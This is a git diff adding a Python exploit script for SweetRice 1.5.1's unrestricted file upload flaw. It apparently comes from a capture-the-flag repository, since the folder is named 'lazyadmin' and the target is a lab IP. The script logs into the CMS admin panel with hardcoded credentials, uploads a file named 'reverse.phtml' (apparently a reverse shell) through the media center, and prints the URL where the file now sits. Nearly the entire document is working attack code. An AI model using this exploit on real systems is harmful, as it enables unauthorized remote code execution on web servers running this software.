diff options
Diffstat (limited to 'lazyadmin/40716.py')
| -rwxr-xr-x | lazyadmin/40716.py | 45 |
1 files changed, 45 insertions, 0 deletions
diff --git a/lazyadmin/40716.py b/lazyadmin/40716.py new file mode 100755 index 0000000..63c6f16 --- /dev/null +++ b/lazyadmin/40716.py @@ -0,0 +1,45 @@ +#/usr/bin/python +#-*- Coding: utf-8 -*- +# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload +# Exploit Author: Ashiyane Digital Security Team +# Date: 03-11-2016 +# Vendor: http://www.basic-cms.org/ +# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip +# Version: 1.5.1 +# Platform: WebApp - PHP - Mysql + +from requests import session + +# Get Host & User & Pass & filename +host = '10.10.101.44/content' +username = 'manager' +password = 'Password123' +filename = 'reverse.phtml' +file = {'upload[]': open(filename, 'rb')} + +payload = { + 'user':username, + 'passwd':password, + 'rememberMe':'' +} + + + +with session() as r: + login = r.post('http://' + host + '/as/?type=signin', data=payload) + success = 'Login success' + if login.status_code == 200: + print("[+] Sending User&Pass...") + if login.text.find(success) > 1: + print("[+] Login Succssfully...") + else: + print("[-] User or Pass is incorrent...") + print("Good Bye...") + exit() + pass + pass + uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file) + if uploadfile.status_code == 200: + print("[+] File Uploaded...") + print("[+] URL : http://" + host + "/attachment/" + filename) + pass |